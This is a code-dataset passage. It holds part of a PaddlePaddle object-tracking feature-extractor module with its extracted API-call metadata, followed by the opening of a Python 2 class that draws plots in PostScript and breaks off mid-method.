                output_features[layer].numpy()
                for layer in self.output_layers
            ])
        return output


class SFCAlexnet(MultiFeatureBase):
    """Alexnet feature.
    args:
        output_layers: List of layers to output.
        net_path: Relative or absolute net path (default should be fine).
        use_gpu: Use GPU or CPU.
    """

    def __init__(self,
                 output_layers=('conv5', ),
                 net_path='estimator',
                 use_gpu=True,
                 *args,
                 **kwargs):
        super().__init__(*args, **kwargs)
        self.output_layers = list(output_layers)
        self.use_gpu = use_gpu
        self.net_path = net_path

    def initialize(self):
        with fluid.dygraph.guard():
            if os.path.isabs(self.net_path):
                net_path_full = self.net_path
            else:
                net_path_full = os.path.join(env_settings().network_path,
                                             self.net_path)

            self.net = siamfc_alexnet(
                backbone_pretrained=False,
                backbone_is_test=True,
                estimator_is_test=True)

            state_dictsm, _ = fluid.load_dygraph(net_path_full)
            self.net.load_dict(state_dictsm)
            self.net.train()

            self.target_estimator = self.net.target_estimator

        self.layer_stride = {'conv5': 8}
        self.layer_dim = {'conv5': 256}

        self.estimator_feature_layers = self.net.target_estimator_layer

        if isinstance(self.pool_stride, int) and self.pool_stride == 1:
            self.pool_stride = [1] * len(self.output_layers)

        self.feature_layers = sorted(
            list(set(self.output_layers + self.estimator_feature_layers)))

        self.mean = np.reshape([0., 0., 0.], [1, -1, 1, 1])
        self.std = np.reshape([1 / 255., 1 / 255., 1 / 255.], [1, -1, 1, 1])

    def free_memory(self):
        if hasattr(self, 'net'):
            del self.net
        if hasattr(self, 'target_estimator'):
            del self.target_estimator
        if hasattr(self, 'estimator_backbone_features'):
            del self.estimator_backbone_features

    def dim(self):
        return TensorList([self.layer_dim[l] for l in self.output_layers])

    def stride(self):
        return TensorList([
            s * self.layer_stride[l]
            for l, s in zip(self.output_layers, self.pool_stride)
        ])

    def extract(self, im: np.ndarray, debug_save_name=None):
        with fluid.dygraph.guard():
            if debug_save_name is not None:
                np.savez(debug_save_name, im)

            im = im / 255.  # don't use im /= 255. since we don't want to alter the input
            im -= self.mean
            im /= self.std
            im = n2p(im)

            output_features = self.net.extract_features(im, self.feature_layers)

            # Store the raw backbone features which are input to estimator
            estimator_backbone_features = TensorList([
                output_features[layer]
                for layer in self.estimator_feature_layers
            ])
            self.estimator_backbone_features = estimator_backbone_features.numpy()

            output = TensorList([
                output_features[layer].numpy()
                for layer in self.output_layers
            ])
        return output


class SRPNAlexNet(MultiFeatureBase):
    """Alexnet feature.
    args:
        output_layers: List of layers to output.
        net_path: Relative or absolute net path (default should be fine).
        use_gpu: Use GPU or CPU.
    """

    def __init__(self, net_path='estimator', use_gpu=True, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.use_gpu = use_gpu
        self.net_path = net_path

    def initialize(self):
        with fluid.dygraph.guard():
            if os.path.isabs(self.net_path):
                net_path_full = self.net_path
            else:
                net_path_full = os.path.join(env_settings().network_path,
                                             self.net_path)

            self.net = SiamRPN_AlexNet(backbone_pretrained=False, is_test=True)

            state_dict, _ = fluid.load_dygraph(net_path_full)
            self.net.load_dict(state_dict)
            self.net.eval()

    def free_memory(self):
        if hasattr(self, 'net'):
            del self.net

    def extract(self, im: np.ndarray, debug_save_name=None):
        with fluid.dygraph.guard():
            if debug_save_name is not None:
                np.savez(debug_save_name, im)

            im = n2p(im)

            output_features = self.net.extract_backbone_features(im)

            # Store the raw backbone features which are input to estimator
            output = TensorList([layer.numpy() for layer in output_features])
        return output


class SMaskResNet50_base(MultiFeatureBase):
    """Resnet50-dilated feature.
    args:
        output_layers: List of layers to output.
        net_path: Relative or absolute net path (default should be fine).
        use_gpu: Use GPU or CPU.
    """

    def __init__(self, net_path='estimator', use_gpu=True, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.use_gpu = use_gpu
        self.net_path = net_path

    def initialize(self):
        with fluid.dygraph.guard():
            if os.path.isabs(self.net_path):
                net_path_full = self.net_path
            else:
                net_path_full = os.path.join(env_settings().network_path,
                                             self.net_path)

            self.net = SiamMask_ResNet50_base(backbone_pretrained=False, is_test=True)

            state_dict, _ = fluid.load_dygraph(net_path_full)
            self.net.load_dict(state_dict)
            self.net.eval()

    def free_memory(self):
        if hasattr(self, 'net'):
            del self.net

    def extract(self, im: np.ndarray, debug_save_name=None):
        with fluid.dygraph.guard():
            if debug_save_name is not None:
                np.savez(debug_save_name, im)

            im = n2p(im)

            output_features = self.net.extract_backbone_features(im)

            # Store the raw backbone features which are input to estimator
            output = TensorList([layer.numpy() for layer in output_features])
        return output


class SMaskResNet50_sharp(MultiFeatureBase):
    """Resnet50-dilated feature.
    args:
        output_layers: List of layers to output.
        net_path: Relative or absolute net path (default should be fine).
        use_gpu: Use GPU or CPU.
    """

    def __init__(self, net_path='estimator', use_gpu=True, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.use_gpu = use_gpu
        self.net_path = net_path

    def initialize(self):
        with fluid.dygraph.guard():
            if os.path.isabs(self.net_path):
                net_path_full = self.net_path
            else:
                net_path_full = os.path.join(env_settings().network_path,
                                             self.net_path)

            self.net = SiamMask_ResNet50_sharp(backbone_pretrained=False, is_test=True)

            state_dict, _ = fluid.load_dygraph(net_path_full)
            self.net.load_dict(state_dict)
            self.net.eval()

    def free_memory(self):
        if hasattr(self, 'net'):
            del self.net

    def extract(self, im: np.ndarray, debug_save_name=None):
        with fluid.dygraph.guard():
            if debug_save_name is not None:
                np.savez(debug_save_name, im)

            im = n2p(im)

            output_features = self.net.extract_backbone_features(im)

            # Store the raw backbone features which are input to estimator
            output = TensorList([layer.numpy() for layer in output_features])
        return output
[((83, 20, 83, 68), 'numpy.reshape', 'np.reshape', ({(83, 31, 83, 52): '[0.485, 0.456, 0.406]', (83, 54, 83, 67): '[1, -1, 1, 1]'}, {}), '([0.485, 0.456, 0.406], [1, -1, 1, 1])', True, 'import numpy as np\n'), ((84, 19, 84, 67), 'numpy.reshape', 'np.reshape', ({(84, 30, 84, 51): '[0.229, 0.224, 0.225]', (84, 53, 84, 66): '[1, -1, 1, 1]'}, {}), '([0.229, 0.224, 0.225], [1, -1, 1, 1])', True, 'import numpy as np\n'), ((97, 15, 97, 74), 'pytracking.libs.TensorList', 'TensorList', ({(97, 26, 97, 73): '[self.layer_dim[l] for l in self.output_layers]'}, {}), '([self.layer_dim[l] for l in self.output_layers])', False, 'from pytracking.libs import TensorList\n'), ((204, 20, 204, 68), 'numpy.reshape', 'np.reshape', ({(204, 31, 204, 52): '[0.485, 0.456, 0.406]', (204, 54, 204, 67): '[1, -1, 1, 1]'}, {}), '([0.485, 0.456, 0.406], [1, -1, 1, 1])', True, 'import numpy as np\n'), ((205, 19, 205, 67), 'numpy.reshape', 'np.reshape', ({(205, 30, 205, 51): '[0.229, 0.224, 0.225]', (205, 53, 205, 66): '[1, -1, 1, 1]'}, {}), '([0.229, 0.224, 0.225], [1, -1, 1, 1])', True, 'import numpy as np\n'), ((218, 15, 218, 74), 'pytracking.libs.TensorList', 'TensorList', ({(218, 26, 218, 73): '[self.layer_dim[l] for l in self.output_layers]'}, {}), '([self.layer_dim[l] for l in self.output_layers])', False, 'from pytracking.libs import TensorList\n'), ((307, 20, 307, 59), 'numpy.reshape', 'np.reshape', ({(307, 31, 307, 43): '[0.0, 0.0, 0.0]', (307, 45, 307, 58): '[1, -1, 1, 1]'}, {}), '([0.0, 0.0, 0.0], [1, -1, 1, 1])', True, 'import numpy as np\n'), ((308, 19, 308, 76), 'numpy.reshape', 'np.reshape', ({(308, 30, 308, 60): '[1 / 255.0, 1 / 255.0, 1 / 255.0]', (308, 62, 308, 75): '[1, -1, 1, 1]'}, {}), '([1 / 255.0, 1 / 255.0, 1 / 255.0], [1, -1, 1, 1])', True, 'import numpy as np\n'), ((319, 15, 319, 74), 'pytracking.libs.TensorList', 'TensorList', ({(319, 26, 319, 73): '[self.layer_dim[l] for l in self.output_layers]'}, {}), '([self.layer_dim[l] for l in self.output_layers])', False, 'from pytracking.libs import TensorList\n'), ((36, 13, 36, 34), 'paddle.fluid.dygraph.guard', 'fluid.dygraph.guard', ({}, {}), '()', False, 'from paddle import fluid\n'), ((37, 15, 37, 43), 'os.path.isabs', 'os.path.isabs', ({(37, 29, 37, 42): 'self.net_path'}, {}), '(self.net_path)', False, 'import os\n'), ((43, 23, 46, 36), 'ltr.models.bbreg.atom.atom_resnet18', 'atom_resnet18', (), '', False, 'from ltr.models.bbreg.atom import atom_resnet50, atom_resnet18\n'), ((48, 30, 48, 63), 'paddle.fluid.load_dygraph', 'fluid.load_dygraph', ({(48, 49, 48, 62): 'net_path_full'}, {}), '(net_path_full)', False, 'from paddle import fluid\n'), ((106, 13, 106, 34), 'paddle.fluid.dygraph.guard', 'fluid.dygraph.guard', ({}, {}), '()', False, 'from paddle import fluid\n'), ((113, 17, 113, 24), 'pytracking.libs.paddle_utils.n2p', 'n2p', ({(113, 21, 113, 23): 'im'}, {}), '(im)', False, 'from pytracking.libs.paddle_utils import n2p\n'), ((118, 39, 120, 14), 'pytracking.libs.TensorList', 'TensorList', ({(118, 50, 120, 13): '[output_features[layer] for layer in self.iounet_feature_layers]'}, {}), '([output_features[layer] for layer in self.iounet_feature_layers])', False, 'from pytracking.libs import TensorList\n'), ((157, 13, 157, 34), 'paddle.fluid.dygraph.guard', 'fluid.dygraph.guard', ({}, {}), '()', False, 'from paddle import fluid\n'), ((158, 15, 158, 43), 'os.path.isabs', 'os.path.isabs', ({(158, 29, 158, 42): 'self.net_path'}, {}), '(self.net_path)', False, 'import os\n'), ((164, 23, 167, 36), 'ltr.models.bbreg.atom.atom_resnet50', 'atom_resnet50', (), 
'', False, 'from ltr.models.bbreg.atom import atom_resnet50, atom_resnet18\n'), ((169, 30, 169, 63), 'paddle.fluid.load_dygraph', 'fluid.load_dygraph', ({(169, 49, 169, 62): 'net_path_full'}, {}), '(net_path_full)', False, 'from paddle import fluid\n'), ((227, 13, 227, 34), 'paddle.fluid.dygraph.guard', 'fluid.dygraph.guard', ({}, {}), '()', False, 'from paddle import fluid\n'), ((234, 17, 234, 24), 'pytracking.libs.paddle_utils.n2p', 'n2p', ({(234, 21, 234, 23): 'im'}, {}), '(im)', False, 'from pytracking.libs.paddle_utils import n2p\n'), ((239, 39, 241, 14), 'pytracking.libs.TensorList', 'TensorList', ({(239, 50, 241, 13): '[output_features[layer] for layer in self.iounet_feature_layers]'}, {}), '([output_features[layer] for layer in self.iounet_feature_layers])', False, 'from pytracking.libs import TensorList\n'), ((278, 13, 278, 34), 'paddle.fluid.dygraph.guard', 'fluid.dygraph.guard', ({}, {}), '()', False, 'from paddle import fluid\n'), ((279, 15, 279, 43), 'os.path.isabs', 'os.path.isabs', ({(279, 29, 279, 42): 'self.net_path'}, {}), '(self.net_path)', False, 'import os\n'), ((285, 23, 288, 39), 'ltr.models.siamese.siam.siamfc_alexnet', 'siamfc_alexnet', (), '', False, 'from ltr.models.siamese.siam import siamfc_alexnet\n'), ((290, 30, 290, 63), 'paddle.fluid.load_dygraph', 'fluid.load_dygraph', ({(290, 49, 290, 62): 'net_path_full'}, {}), '(net_path_full)', False, 'from paddle import fluid\n'), ((328, 13, 328, 34), 'paddle.fluid.dygraph.guard', 'fluid.dygraph.guard', ({}, {}), '()', False, 'from paddle import fluid\n'), ((335, 17, 335, 24), 'pytracking.libs.paddle_utils.n2p', 'n2p', ({(335, 21, 335, 23): 'im'}, {}), '(im)', False, 'from pytracking.libs.paddle_utils import n2p\n'), ((340, 42, 343, 14), 'pytracking.libs.TensorList', 'TensorList', ({(340, 53, 343, 13): '[output_features[layer] for layer in self.estimator_feature_layers]'}, {}), '([output_features[layer] for layer in self.estimator_feature_layers])', False, 'from pytracking.libs import TensorList\n'), ((371, 13, 371, 34), 'paddle.fluid.dygraph.guard', 'fluid.dygraph.guard', ({}, {}), '()', False, 'from paddle import fluid\n'), ((372, 15, 372, 43), 'os.path.isabs', 'os.path.isabs', ({(372, 29, 372, 42): 'self.net_path'}, {}), '(self.net_path)', False, 'import os\n'), ((377, 23, 377, 79), 'ltr.models.siam.siam.SiamRPN_AlexNet', 'SiamRPN_AlexNet', (), '', False, 'from ltr.models.siam.siam import SiamRPN_AlexNet, SiamMask_ResNet50_sharp, SiamMask_ResNet50_base\n'), ((379, 28, 379, 61), 'paddle.fluid.load_dygraph', 'fluid.load_dygraph', ({(379, 47, 379, 60): 'net_path_full'}, {}), '(net_path_full)', False, 'from paddle import fluid\n'), ((388, 13, 388, 34), 'paddle.fluid.dygraph.guard', 'fluid.dygraph.guard', ({}, {}), '()', False, 'from paddle import fluid\n'), ((392, 17, 392, 24), 'pytracking.libs.paddle_utils.n2p', 'n2p', ({(392, 21, 392, 23): 'im'}, {}), '(im)', False, 'from pytracking.libs.paddle_utils import n2p\n'), ((419, 13, 419, 34), 'paddle.fluid.dygraph.guard', 'fluid.dygraph.guard', ({}, {}), '()', False, 'from paddle import fluid\n'), ((420, 15, 420, 43), 'os.path.isabs', 'os.path.isabs', ({(420, 29, 420, 42): 'self.net_path'}, {}), '(self.net_path)', False, 'import os\n'), ((425, 23, 425, 86), 'ltr.models.siam.siam.SiamMask_ResNet50_base', 'SiamMask_ResNet50_base', (), '', False, 'from ltr.models.siam.siam import SiamRPN_AlexNet, SiamMask_ResNet50_sharp, SiamMask_ResNet50_base\n'), ((427, 28, 427, 61), 'paddle.fluid.load_dygraph', 'fluid.load_dygraph', ({(427, 47, 427, 60): 'net_path_full'}, {}), 
'(net_path_full)', False, 'from paddle import fluid\n'), ((436, 13, 436, 34), 'paddle.fluid.dygraph.guard', 'fluid.dygraph.guard', ({}, {}), '()', False, 'from paddle import fluid\n'), ((440, 17, 440, 24), 'pytracking.libs.paddle_utils.n2p', 'n2p', ({(440, 21, 440, 23): 'im'}, {}), '(im)', False, 'from pytracking.libs.paddle_utils import n2p\n'), ((467, 13, 467, 34), 'paddle.fluid.dygraph.guard', 'fluid.dygraph.guard', ({}, {}), '()', False, 'from paddle import fluid\n'), ((468, 15, 468, 43), 'os.path.isabs', 'os.path.isabs', ({(468, 29, 468, 42): 'self.net_path'}, {}), '(self.net_path)', False, 'import os\n'), ((473, 23, 473, 87), 'ltr.models.siam.siam.SiamMask_ResNet50_sharp', 'SiamMask_ResNet50_sharp', (), '', False, 'from ltr.models.siam.siam import SiamRPN_AlexNet, SiamMask_ResNet50_sharp, SiamMask_ResNet50_base\n'), ((475, 28, 475, 61), 'paddle.fluid.load_dygraph', 'fluid.load_dygraph', ({(475, 47, 475, 60): 'net_path_full'}, {}), '(net_path_full)', False, 'from paddle import fluid\n'), ((484, 13, 484, 34), 'paddle.fluid.dygraph.guard', 'fluid.dygraph.guard', ({}, {}), '()', False, 'from paddle import fluid\n'), ((488, 17, 488, 24), 'pytracking.libs.paddle_utils.n2p', 'n2p', ({(488, 21, 488, 23): 'im'}, {}), '(im)', False, 'from pytracking.libs.paddle_utils import n2p\n'), ((108, 16, 108, 45), 'numpy.savez', 'np.savez', ({(108, 25, 108, 40): 'debug_save_name', (108, 42, 108, 44): 'im'}, {}), '(debug_save_name, im)', True, 'import numpy as np\n'), ((229, 16, 229, 45), 'numpy.savez', 'np.savez', ({(229, 25, 229, 40): 'debug_save_name', (229, 42, 229, 44): 'im'}, {}), '(debug_save_name, im)', True, 'import numpy as np\n'), ((330, 16, 330, 45), 'numpy.savez', 'np.savez', ({(330, 25, 330, 40): 'debug_save_name', (330, 42, 330, 44): 'im'}, {}), '(debug_save_name, im)', True, 'import numpy as np\n'), ((390, 16, 390, 45), 'numpy.savez', 'np.savez', ({(390, 25, 390, 40): 'debug_save_name', (390, 42, 390, 44): 'im'}, {}), '(debug_save_name, im)', True, 'import numpy as np\n'), ((438, 16, 438, 45), 'numpy.savez', 'np.savez', ({(438, 25, 438, 40): 'debug_save_name', (438, 42, 438, 44): 'im'}, {}), '(debug_save_name, im)', True, 'import numpy as np\n'), ((486, 16, 486, 45), 'numpy.savez', 'np.savez', ({(486, 25, 486, 40): 'debug_save_name', (486, 42, 486, 44): 'im'}, {}), '(debug_save_name, im)', True, 'import numpy as np\n'), ((40, 45, 40, 59), 'pytracking.admin.environment.env_settings', 'env_settings', ({}, {}), '()', False, 'from pytracking.admin.environment import env_settings\n'), ((161, 45, 161, 59), 'pytracking.admin.environment.env_settings', 'env_settings', ({}, {}), '()', False, 'from pytracking.admin.environment import env_settings\n'), ((282, 45, 282, 59), 'pytracking.admin.environment.env_settings', 'env_settings', ({}, {}), '()', False, 'from pytracking.admin.environment import env_settings\n'), ((375, 45, 375, 59), 'pytracking.admin.environment.env_settings', 'env_settings', ({}, {}), '()', False, 'from pytracking.admin.environment import env_settings\n'), ((423, 45, 423, 59), 'pytracking.admin.environment.env_settings', 'env_settings', ({}, {}), '()', False, 'from pytracking.admin.environment import env_settings\n'), ((471, 45, 471, 59), 'pytracking.admin.environment.env_settings', 'env_settings', ({}, {}), '()', False, 'from pytracking.admin.environment import env_settings\n')]
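The extracted calls above repeatedly use np.reshape(..., [1, -1, 1, 1]) to prepare per-channel mean/std values for normalizing image batches. A minimal numpy sketch of that broadcasting pattern (the batch shape below is assumed purely for illustration):

import numpy as np

# Hypothetical NCHW batch; 224x224 is an assumed size for illustration only.
im = np.random.rand(1, 3, 224, 224).astype(np.float32)

# Reshaping the 3-element mean/std to [1, -1, 1, 1] lets them broadcast over
# the channel axis of an NCHW tensor, matching the reshape calls listed above.
mean = np.reshape([0.485, 0.456, 0.406], [1, -1, 1, 1])
std = np.reshape([0.229, 0.224, 0.225], [1, -1, 1, 1])

normalized = (im - mean) / std
print(normalized.shape)  # (1, 3, 224, 224)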
fakeNetflix/facebook-repo-fbkutils
netesto/local/psPlot.py
16ec0c024322c163e7dbe691812ba8fdf5b511ad
#!/usr/bin/env python2 import sys import random import os.path import shutil import commands import types import math #gsPath = '/usr/local/bin/gs' gsPath = 'gs' logFile = '/dev/null' #logFile = 'plot.log' #--- class PsPlot(fname, pageHeader, pageSubHeader, plotsPerPage) # class PsPlot(object): def __init__(self, fname, pageHeader, pageSubHeader, plotsPerPage): self.foutPath = os.path.dirname(fname)+'/' if self.foutPath == '/': self.foutPath = '' self.foutName = os.path.basename(fname) self.fname = fname+'.ps' self.pageHeader = pageHeader self.pageSubHeader = pageSubHeader self.plotsPerPage = plotsPerPage self.yfix1 = '' self.yfix2 = '' self.xGrid = 1 self.yGrid = 1 self.xUniform = False self.xLen = 6.5 #inches self.seriesTitle = ' ' self.x0 = 0 self.xInc = 0 self.xCount = 0 self.xList = [] self.xDict = {} self.y1Inc = 0 self.y1Count = 0 self.y1LogScale = 0 self.y2Inc = 0 self.y2Count = 0 self.y2LogScale = 0 self.xOffset = 0 self.colors = [ (0.7,0.7,0.7), (0,0,0.8), (0.8,0,0), (0.42,0.55,0.14), (0.6,0.5,0.3), (0.6,0.2,0.8), (0,0.8,0), (0.4,0.3,0.5), (0.5,0.5,0.5), (0.8,0.0,0.0), (0,0,0) ] self.colorsN = 11 self.colorRed = (0.8,0,0) self.colorGreen = (0,0.8,0) self.colorBlue = (0,0,0.8) self.colorAqua = (0,0.5,0.5) self.colorWhite = (1,1,1) self.ColorBlack = (0,0,0) self.xSize = 1800 self.ySize = 900 shutil.copy('plot-header.ps', self.fname) self.fout = open(self.fname, 'a') self.flog = open(logFile, 'a') # self.flog = open('./psPlot.out', 'a') if plotsPerPage == 4: print >>self.fout, '/doGraph { graph4v } def' print >>self.fout, '/nextGraph { nextGraph4v } def' elif plotsPerPage == 3: print >>self.fout, '/doGraph { graph3v } def' print >>self.fout, '/nextGraph { nextGraph3v } def' elif plotsPerPage == 2: print >>self.fout, '/doGraph { graph2v } def' print >>self.fout, '/nextGraph { nextGraph2v } def' else: print >>self.fout, '/doGraph { graph1v } def' print >>self.fout, '/nextGraph { nextGraph1v } def' print >>self.fout, '/showpage {\n 40 742 moveto' print >>self.fout, '/Helvetica findfont 12 scalefont setfont' if self.pageHeader != '': print >>self.fout, '(',self.pageHeader,') show' if self.pageSubHeader != '': print >>self.fout, '40 726 moveto\n (',self.pageSubHeader,') show' print >>self.fout, 'showpage\n} bind def' print >>self.fout, 'doGraph' #--- End() # def End(self): print >>self.fout, '\nshowpage\nend' self.fout.close() #--- GetInc(vMin, vMax) def GetInc(self,vMin, vMax): ff = 1.0 while vMax <= 1 and vMax > 0: ff *= 0.10 vMin *= 10 vMax *= 10 v0 = int(vMin) v1 = int(vMax+0.99) f = 1 w = v1 - v0 if w == 0: v1 = v0 + 1 w = 1 while w/f >= 100: f *= 10 # w = int(w/f) v0 = int(v0/f) v1 = int(v1/f) if (vMin % f) != 0 and vMax == v1: v1 += 1 w = v1 - v0 if w <= 10: vInc = 1 elif w <= 20: vInc = 2 else: m = 10 while w/m > 100: m *= 10 if (v0 >= 0) and (v0 % m) != 0: v0 = int(v0 / m) * m if (v1 % m) != 0: v1 = int(v1 / m) * m + m w = v1 - v0 if w <= 5*m: vInc = m/2 else: vInc = m else: vInc = m # if (vMax/f)%vInc != 0 or v1 % vInc != 0: if v1 % vInc != 0: v1 = int(v1/vInc)*vInc + vInc if (v0 % vInc) != 0: v0 = int(v0/vInc)*vInc v0 += vInc v0 *= (f*ff) v1 *= (f*ff) vInc *= (f*ff) return v0, v1, vInc #--- ValueConvert(v) # def ValueConvert(self, v, inc): if inc > 0: logInc = int(math.log10(v/inc)) d = math.pow(10,logInc) if d == 0: d = 10.0 else: d = 10.0 if d == 1 and float(v)/inc > 1.0: d = 10.0 if v >= 1000000000 and inc > 1: s = int(v/(1000000000/d))/d if s*d == int(s)*d: s = int(s) r = str(s) + 'G' elif v >= 1000000 and inc > 1: s = int(v/(1000000/d))/d if s*d == int(s)*d: s = int(s) r 
= str(s) + 'M' elif v >= 1000 and inc > 1: s = int(v/(1000/d))/d if s*d == int(s)*d: s = int(s) r = str(s) + 'K' elif v >= 1: s = int(v*d)/d if s*d == int(s)*d: s = int(s) r = str(s) else: r = str(int(v*100)/100.0) return r #--- GetAxis(vBeg, vEnd, vInc, logFlag) # def GetAxis(self, vBeg, vEnd, vInc, logFlag): fix = '{ 0 add }' if isinstance(vBeg,list): vList = vBeg vList.append(' ') self.xUniform = True v0 = 1 v1 = len(vList) vi = 1 fix = '{ '+str(v0-vi)+' sub '+str(vi)+' div }' logFlag = 0 else: if vInc == 0: v0,v1,vi = self.GetInc(vBeg,vEnd) else: v0 = vBeg v1 = vEnd vi = vInc if vBeg > 0 and (logFlag==1 or (logFlag==0 and (vEnd/vBeg > 100))): v0 = vBeg v1 = vEnd logFlag = 1 v0Log = math.log10(v0) t = math.ceil(v0Log) ff = math.modf(v0Log) if math.fabs(ff[0]) < math.fabs(v0Log)/1000 and t < 0: t += 1 logOffset = 0 while t < 1: logOffset += 1 t += 1 v0 = math.pow(10,math.floor(v0Log)+1) v1 = math.pow(10,math.ceil(math.log10(v1))) vi = 1 vList = [] v = v0 while v <= v1: vList.append(self.ValueConvert(v,0)) v *= 10 if v0 > 1: logOffset -= (math.log10(v0) - 1) # substract 1 from above inside parent? fix = '{ dup 0 eq { } { log '+str(logOffset)+' add } ifelse }' else: logFlag = 0 v = v0 vList = [] n = 0 while True: vList.append(self.ValueConvert(v,vi)) if v > vEnd: break n += 1 v = v0 + n*vi fix = '{ '+str(v0-vi)+' sub '+str(vi)+' div }' print >>self.flog, 'v0:',v0,' vi:',vi,' v1:',v1,' (',vEnd,')' print >>self.flog, 'vList: ', vList print >>self.flog, 'logFlag: ', logFlag, ' fix: ', fix return v0,v1,vi,vList,fix,logFlag #--- SetXLen(xlen) def SetXLen(self, xlen): self.xLen = xlen print >>self.fout, '/xAxisLen %.2f def' % self.xLen print >>self.fout, 'doGraph' return #--- SetXSize(xsize) def SetXSize(self, xsize): self.xSize = xsize return #--- SetYSize(ysize) def SetYSize(self, ysize): self.ySize = ysize return #--- SetPlotBgLevel(level) # def SetPlotBgLevel(self,level): print >>self.fout, '/plotBgLevel ', level, 'def\n' return #--- SetPlotPercentDir(value) def SetPlotPercentDir(self,value): if value == 'Vertical': print >>self.fout, '/plotNumPercentDir 1 def\n' else: print >>self.fout, '/plotNumPercentDir 0 def\n' return #--- SetPlotYLogScale(axis,value) # def SetPlotYLogScale(self,axis,value): if value == 'Off': v = -1 elif value == 'On': v = 1 else: v = 0; if axis == 1: self.y1LogScale = v else: self.y2LogScale = v return #--- SetPlot(xbeg,xend,xinc,ybeg,yend,yinc,xtitle,ytitle,title) # def SetPlot(self,xbeg,xend,xinc,ybeg,yend,yinc,xtitle,ytitle,title): print >>self.fout, '\n\nnextGraph\n1 setlinewidth\n' (x0,x1,xi,xList,fix,logFlag) = self.GetAxis(xbeg,xend,xinc,0) self.x0 = x0 self.xInc = xi self.xCount = len(xList) self.xList = xList self.xDict = {} k = 1 for x in xList: self.xDict[x] = k k=k+1 print >>self.fout, '/xfix ', fix, ' def\n' (y0,y1,yi,yList,fix,logFlag) = self.GetAxis(ybeg,yend,yinc, self.y1LogScale) self.y1Inc = yi self.y1Count = len(yList) self.yfix1 = '/yfix '+fix+' def\n /yinc yinc1 def' print >>self.fout, self.yfix1 print >>self.fout, '[ ' for x in xList: self.fout.write('('+str(x)+') ') self.fout.write(' ]\n[ ') for y in yList: self.fout.write('('+str(y)+') ') print >>self.fout, ' ]' print >>self.fout, '('+xtitle+')\n('+ytitle+')\naxes\n' print >>self.fout, self.xGrid, self.yGrid, ' grid\n' print >>self.fout, '/ymtitle ypos ylen add 10 add def\n' # Multiple lines in title are separated by '|' print >>self.flog, 'Main Title: '+title titleLines = title.split('|') for t in titleLines: if len(t) > 0: print >>self.flog, ' '+t print >>self.fout, '('+t+')\n' print 
>>self.fout, 'Mtitles\n' # print >>self.fout, '('+title+')\nMtitles\n' if logFlag == 1: print >>self.fout, 'beginFunction\n' for ys in yList: factor = 1 if ys[-1:] == 'K': yss = ys[:-1] factor = 1000 elif ys[-1:] == 'M': yss = ys[:-1] factor = 1000000 else: yss = ys y = float(yss)*factor/10.0 k = 2 while k < 10: print >>self.fout, 0, k*y k += 1 print >>self.fout, 'endFunction\n' print >>self.fout, '19 { 0 0 0 setrgbcolor } plotSymbolsC\n' return y1 #--- SetPlot2(xbeg,xend,xinc,ybeg,yend,yinc,zbeg,zend,zinc, # xtitle,ytitle,ztitle,title) # def SetPlot2(self,xbeg,xend,xinc,ybeg,yend,yinc,zbeg,zend,zinc, xtitle,ytitle,ztitle,title): rv = self.SetPlot(xbeg,xend,xinc,ybeg,yend,yinc,xtitle,ytitle,title) (z0,z1,zi,zList,fix,logFlag) = self.GetAxis(zbeg,zend,zinc,self.y2LogScale) self.y2Inc = zi self.y2Count = len(zList) print >>self.fout, '/Flag2Yaxes 1 def' self.yfix2 = '/yfix '+fix+' def\n/yinc yinc2 def' print >>self.fout, 'axpos axlen add aypos aylen' self.fout.write('[ ') for z in zList: self.fout.write('('+str(z)+') ') self.fout.write(' ]') if ztitle != '': print >>self.fout, '('+ztitle+') vaxis2' if logFlag == 1: print >>self.fout, self.yfix2 print >>self.fout, 'beginFunction\n' for zs in zList: factor = 1 if zs[-1:] == 'K': zss = zs[:-1] factor = 1000 elif zs[-1:] == 'M': zss = zs[:-1] factor = 1000000 else: zss = zs y = float(zss)*factor/10.0 k = 2 while k < 10: print >>self.fout, self.xCount, k*y k += 1 print >>self.fout, 'endFunction\n' print >>self.fout, '18 { 0.72 0.52 0.5 setrgbcolor } plotSymbolsC\n' return rv #--- SetColor(color) # def SetColor(self, color): rv = ' { '+str(color[0])+' '+str(color[1])+' '+str(color[2])+ \ ' setrgbcolor } ' return rv #--- GetColorIndx(indx) # def GetColorIndx(self, indx): color = self.colors[indx % self.colorsN] rv = ' { '+str(color[0])+' '+str(color[1])+' '+str(color[2])+ \ ' setrgbcolor } ' return rv #--- SetColorIndx(indx, r, g, b) # def SetColorIndx(self, indx, r, g, b): self.colors[indx][0] = r self.colors[indx][1] = g self.colors[indx][2] = b return rv #--- outputPS(string) # def outputPS(self, s): print >>self.fout, s #--- SeriesNames(names) # def SeriesNames(self, names): indx = len(names) - 1 if indx == 0: return print >>self.fout, '('+self.seriesTitle+')' while indx >= 0: if names[indx] != None: print >>self.fout, '('+names[indx]+') ' print >>self.fout, self.SetColor(self.colors[indx % self.colorsN]) indx -= 1 print >>self.fout, 'fdescriptionsC' #--- PlotVBars(xList, type) # def PlotVBars(self, xList, type): flog = self.flog print >>self.fout, self.yfix1 print >>self.fout, 'beginFunction\n' endFun = 'endFunction\n' indx = 0 for x in xList: if x == ' ' and indx == len(xList)-1: continue indx += 1 print >>self.fout, x, 0.0 if (indx != 0) and (indx % 1000) == 0: print >>self.fout, endFun+type+'\nbeginFunction\n' print >>self.fout, x print >>self.fout, endFun, type, '\n' return #--- PlotData(axis, xList, yList, zList, id, type) # def PlotData(self, axis, xList, yList, zList, id, type): flog = self.flog print >>flog, 'graph xList: ', self.xList, ' xList: ', xList, \ ' yList: ', yList print >>self.fout, '%\n% Plot '+id+'\n%\n' print >>self.fout, '/xfix { ', self.x0 - self.xInc - self.xOffset,' sub ', self.xInc, ' div ', 0.0,' add } def\n' if axis == 2: print >>self.fout, self.yfix2 elif axis == 1: print >>self.fout, self.yfix1 # else: # print >>self.fout, '/yfix { 0 add } def\n' print >>self.fout, 'beginFunction\n' if isinstance(zList,list): endFun = 'endFunctionW\n' else: endFun = 'endFunction\n' indx = 0 for x in xList: if x == ' ' and indx == 
